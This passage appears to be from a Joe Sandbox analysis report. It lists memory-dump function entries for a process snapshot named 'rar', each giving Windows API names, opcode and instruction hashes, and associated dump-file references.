                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1231390398-0
                                                                                                                                                                                                                              • Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                              • Instruction ID: 48a45bb72e7a7dc2c9e6ab1494d412fad68611ef40eb4409760867748e2cd312
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7E0E521B3846186EBE8B7198495FA96390BF44B80FC02035E44A83A14DE5CC5448B10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                              • Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                              • Instruction ID: ba67587933355c8dd6bfb58b65fc5e06827d1b50bc3a37a3aef921b32fc8632d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97E08661F1D523C2FF04B7F25405574E2D17F58760F884030DD1D4A291EEAC68414634
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 7b45582bae7dd69f792145e90e6da2b9b411708c317b45820f8f66ef8b840033
                                                                                                                                                                                                                              • Instruction ID: 51676a87002884d615ed2ed217675d6cf7d04a18ba3494759e130192050cbc38
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b45582bae7dd69f792145e90e6da2b9b411708c317b45820f8f66ef8b840033
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2E1D621A0C6A2C9FB20FB2494542BEA751FF41BA8F844335DECD0BBD6DEAD9455C720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: c86521b1d8875bcba69ce37d260f22ca13c49f0672248d2e89784453983af802
                                                                                                                                                                                                                              • Instruction ID: 2220790a54460c3e9fd42a03d6d07f4376064a16590cb4765b0c45e63ebe797f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c86521b1d8875bcba69ce37d260f22ca13c49f0672248d2e89784453983af802
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF513672518BE195E701AF34A8441ED37A8FB44F98F58423ADF880B79ADF7950A2C331
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                                              • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                              • Instruction ID: 4c7b2a2df69114b0e0732b9d9881eede9e01bf6a5ba2812d86b1724e3aa1ebb4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B41B221A0D663C2FB69BB18A45067CE251FF98760FC94436D92D4BAD2DEBCE8448760
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CommandLine
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3253501508-0
                                                                                                                                                                                                                              • Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                              • Instruction ID: bc746466aeeea93a8a85eff88613f69551265ea9f1b14405a8d4698843a7dc86
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3901961260CA92C5FA10F756A4101BDD6A0FF85BA4FC80432EE4D073A9DFBDD4418320
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                              • Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                              • Instruction ID: 51851342c05201f1d163d9d082955e90d483758b515faa48e81d9f61f446204c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B012C51A0C663C4FA65B766AA40E79E1917F74BF4FCC8230ED3D862D6FDADA4014230
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CompareString
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1825529933-0
                                                                                                                                                                                                                              • Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                              • Instruction ID: a68233c1bc34f3f5d02abb87c2e3404a1c0c0e79794d5b2bab039a4d7567a62e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4018F61B0C6A2C5FA10BB06A40407AE610BB89FE0F9C4934EFCD4BB5ACEBDD0424714
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseFind
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1863332320-0
                                                                                                                                                                                                                              • Opcode ID: 37315976747a324bc4a89ca9f4e050d50d4baea4dbab69f22b0b8f40f318d585
                                                                                                                                                                                                                              • Instruction ID: af10a61056ab6a59483e701a14d8d0fc94bcb3e77cf21ff5f802b676e094ccb1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 37315976747a324bc4a89ca9f4e050d50d4baea4dbab69f22b0b8f40f318d585
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FEF06D6190C6D1C6EB11BBA591412F8A690BB06BB9F984335DEBC0B2D7CEA895848730
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                              • Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                                                                              • Instruction ID: 75286a07c25c419712850f287310eceb4789bc5bd83d3ebb9d61c18df57b9dfb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9F0FE11B4D267C1FA647BA15941AB5E2916F647B0FCC1630FD3E852C1FEDCE8514534
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                              • Instruction ID: 8e1e8bf2303a8f1bc2c7284ca02a93f429c819097a1e4ed9d5733d20aae6b455
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ACE0B660F1D326C2FD693B62685107D82403F6ABA1E99643DCC1E4A7C2DD9EA4A95720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                                                                                              • Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                                                                              • Instruction ID: 8bd5674956716152b0d98d0b7f564a8bb9205b08a8c78fdc11574f0819ba89cb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
